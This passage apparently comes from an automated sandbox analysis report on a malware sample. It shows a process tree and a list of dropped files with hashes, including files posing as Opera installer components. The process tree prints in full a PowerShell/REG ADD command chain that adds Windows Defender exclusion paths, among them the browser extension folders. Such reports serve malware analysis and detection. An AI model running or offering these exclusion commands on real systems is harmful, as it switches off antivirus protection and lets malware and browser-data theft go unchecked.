                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FkMZKwlyurpoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FkMZKwlyurpoC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KkyMxCHiU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KkyMxCHiU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wLfJQuAadbUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wLfJQuAadbUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpRaYhcvJOtU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpRaYhcvJOtU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZkSlxqOxvEFNINVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZkSlxqOxvEFNINVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uapGLxaXCyhumuBW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uapGLxaXCyhumuBW\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4068
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FkMZKwlyurpoC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4916
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FkMZKwlyurpoC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:4972
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FkMZKwlyurpoC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5908
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KkyMxCHiU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:3272
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KkyMxCHiU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5588
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4864
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5184
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLfJQuAadbUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:876
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLfJQuAadbUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2484
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpRaYhcvJOtU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5168
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpRaYhcvJOtU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3752
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZkSlxqOxvEFNINVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5492
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZkSlxqOxvEFNINVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3816
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2344
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5900 -ip 5900
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5576

                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                    • C:\ProgramData\Are.docx

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                                                    • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      593KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                                    • C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1024KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      3e0c5d0dfe8abc71d8609b02dba39169

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      038e1207a7dd0c13f64204d9466fbafa8fbc08cb

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      7fd2d86e40a224c67a783dfc6353ce20c559fe4cb6a899b2875c0ec8d97d0f41

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      cb58530108a7fd9b0e4db1814c3e1cd775daa3251aa3f6cf4015f3cdcfba09768273b3fae6f64b0ee6719d8fd17122910d3821aa938b161a5954371ecc1c625b

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d1c9d0a517561991b588b72ae722ad70

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      b285b62be0cc06540f478638266250e2b7a79856

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      6d205a06eaa8eb5e43ac89abf54c606337bf39943c6dfae0fe5f0a541253b385

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      291d42927f4e84d7af6069456245f29097bb438ca951e8e12dd5245f675e8cdc5616a6955a1b2d9a26dd1af5008fa59c0eea514327f25c44cc969a94f18807c5

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JVj1qEtdxsUSRfq6lUYWP1us.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      832KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      611ed40f261ffaa0fc88341280d8e1e3

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      cd0007d5e72d51009c94e4834837c924d2bef30a

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      12014b725f54a5fa16b7cb18b5867cbe00aae3be46e6a54c46e9acfe64a11233

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      2291d71ca0e18bb193fa3a540a147d9205320021b69d188912eb13318958538dc2474e1104b516a941abb162e6bf9860c0608890fbbf644e5254bc42b1362570

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS7FBA.tmp\Install.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      384KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      95921c63f4a7a6d49f6b741782985506

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      32533b5c6d014fe35d8ed734a66facf7dad67687

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      73968a1f212a78e2d095718a1054aa72e99dcd3b820119cbbf414cc56375e6ed

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      d0720097c7e9a3e17e588885f97febc07eb67a1dd9f7b9051f2a6ed58cc3ee9a8084e4aa9148cb7d503254f69efc183f3d9fb589212e64f59572872aff057d96

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS7FBA.tmp\Install.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      704KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      fbd9b2168e3cefa3bcdccfa398a19753

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      39740c4e7caee58524cadc1c75d3566277e6c3a7

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      56b0fc1cbb9ada7e5dc248e110321c61e8e2502a81cea973819d74667585ef4e

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      69c77ed66c277bbf2fd8c954e310dc05b9002817be3396222568c37609742217e3a90f5846fac5248dde783bb4e8da47a036daefadeb689cb2558800cc03a890

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8855.tmp\Install.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      ecc8093aed485509125654591fb71f0d

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      9321ae037ec676de52bf3a3aa3491cfbe22dc612

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      606c92e831eec62438b883c404d2cd51bf6a7f9572d0ab7e03969e1954afbec6

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      636887ba04bd9703108c396250951a4cd87d8fda7f0633965818684426bfb74bf6c4478835e550db9cd6874a878eae75913a74b5f6dedef0bd85745e0dc2c219

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS896F.tmp\Install.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      166f6e7685f2998fac5211e6d173be82

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      0c8b1998a1cd4bd9f2cd9bed33898dbeb45e0735

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      29d4dede3f5cca12b7882b4d174de3cfaf2f3a7e7e4979d99991b8bc65441e24

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      6c7d4b5dbe1cffc32ba5f4e9cf66899372fa97de58182474febc8dca38121f7fe7ee372e28bce81e4ff384458ace53230fe2c91a1267b1c279d970d655aec2f2

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS896F.tmp\Install.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      9de40c2b8deddfc0b9d516835c1e6278

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      2666e97b6f57a05d27eb67463ac4b35e67753011

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      9e010c590b09f245354b98c4b1a30fd52cabcae631d2e9c043121eea8b9d76aa

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      d5790cabe521fe0e30301c671ecf34ced773b02e8e974c57541f3f556de89334e52c86c2110a90b32293ae379530af68b9da3809a4ac37e1cae0979dbd9a2a57

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS9258.tmp\Install.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      576KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      4e6bfc634fe4d9300a2c96d518932561

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ee1c63bf1cc96f3db8b8aac4b5c9278ba57789f0

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0f02c1bd2fd82f9749700d6c674d8cd3acdcd605baaaef319b6af830e8428191

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      99768b4b71fa98cfb5d0c25cdd2edc2adb0dbf63fc81fb67947e4a04dbbda7595b7a73d2763fd7dbf9e6447e0faad7198edacd33a18c60e1038008bd3fefa6be

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      832KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      878c830c1299b4949edcff11bbf20d04

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      b1262134e25928e4708a125a6736d756c9d0f4bf

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0edfafbe74c65b4d37f1f5a5ce8cde9012bb99682af03c92071819d24e6959aa

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      650491fdbace695af97871036dbf86bd5e9b2ea8494110b166a339b1f761dbd2a3b2fee020bbb817f3a3cfd06491103791fc81c62f61a30b0a7066e8ee961f3b

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403190258159092472.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      896KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c2e5f3151b6c5d37e388821ead451d68

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      428f298cc6c6ccbc5b0bd832082f8bd085b14e2f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      77b3fb0048c12217194d76b431fd24d170e1ab5be5ba809d6110412463a7a940

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      10d4c751ff4a563e5f6cb6845c1d01026159519578d35c9fde578008b3c39d5ea3b9c3fa4d069fef595f66822e6c73d5faf97f003840bb7152611efe94d66aac

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Opera_installer_240319025816222212.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      768KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      5211f9cca525fc0206a2ef0fd62c8729

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      2a93c67df84846169b544293a9444fbeb930a241

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      ef73d0802cbcc06e1fcd90a09c9dbb82fb0b40174001d3dc15c20eaaddcb141c

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      17b05162aac67cfbf8fb33f9ac28234b3f8e98f52a86386b67c44713eefa13c47387aed8b24eedae0dfb69c6d91cc80235e6f5aec1455172e189b0ee47d8d9af

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403190258263405256.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      bff6a56c1ff3d1efdd9dda95dd447477

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      20aad35cb46b4207c0ddd152942a1510233a7c63

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      40904673f2066a7ba8f622fddc66d53e18d3e84ce406237d28e257d26a36260a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3742d46d9dc7ceee6544d615489eee1a7fef10d27a19f46909c97cfce733c43a86b8993f8d2eae3a1aafb254a9f5c23a071c5b59eb5dd85ca8573bb81f7c9c8d

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403190258263405256.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      576KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      4311094279d49b549ddeb2dfa119aaec

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      eae0f7c19b191232fe276af4cf5bded2fa58e9a7

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      70ed755820a17f15cc0d386ebd9d2472aeb0029f85e8d19814e373cf242e42fd

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      358a6471f122c82682e0729c18a75bb1449c261a7d3690ddf4dadc86373be77ed8fb80564ba93221068add1842e9494c1761d55a1cf233210e6a235e8c8e0d87

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403190258273095440.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      832KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      8044657c7f04f53eaec26eabeb3a0ad4

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      6c1a438b835a1d601caf6eb5832ed49a73891a9d

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      d5220894bfd8e3a508cdbe85e8d7a11201b345d192dc6ade2e6955f4a9ee6a41

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      5a8609a4a92712d1bf632e5b95e228e1f3ac49ff4b21e84d01986da609458bf32632d4a48bff75a4292a95b0dd3e73f1808fb1513433a4dd09cb1df0b8adf0bd

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qg03v5va.syq.ps1

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      60B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-A54V3.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a69559718ab506675e907fe49deb71e9

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-NDRQ9.tmp\BOValDiVDjiQWzr6UN6p6jA7.tmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      ecaed49314c3b3cf27328741cf50f6f6

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ec75e92fbb1c7763e9831d2fdacb6c76648bbc7e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      1d048019f8aa8985bc39bd427bb1b4c40a98849ead2bd46d63909bd034e830ec

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      d512a77b0496a2f48680163dc920ab22056b761c014a8480aaa787b42f4783e767421ec64503201463422ba9e849a670753e846edcd48ab8fa5bfc62df6408e0

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\nsyDA74.tmp\INetC.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      21KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      2b342079303895c50af8040a91f30f71

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      b11335e1cb8356d9c337cb89fe81d669a69de17e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      270KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      7e4d1605c70c59de5227e3d5659eb695

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      b96a7f558bbb469807964b623b99824fe8fbec91

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      5fee0cbb56fcc342096e780044752cffd00f12db5f3f9b0c9b836aec876b8036

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      69162b933ca0be70b3bc002bfe35a1e39a8b8e4ac66532f07a0ece9d48e2c9838f15634eb40555fab4dba4c41a1e094526a0c02b7ef2ae1ad496e99841e86864

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\u2ls.0.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      312KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      781e3688d601e5b1d7f6dccf4b758f14

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      960af402a3aad0343c5138313757f2ffdfb01a22

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      4249dca43764761d7d452b6bfb8e19964f661791d4031675d0c02d24695a2b34

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      f02e04cd11d84e67cd83ba4ca2f78c9c017e1842e27240bc591b59e6bdca103a0b38afc5474cbc9a99124ec38efff91e304caf7bd272edd9edca184ff2df0d4c

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\u2ls.1.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.4MB

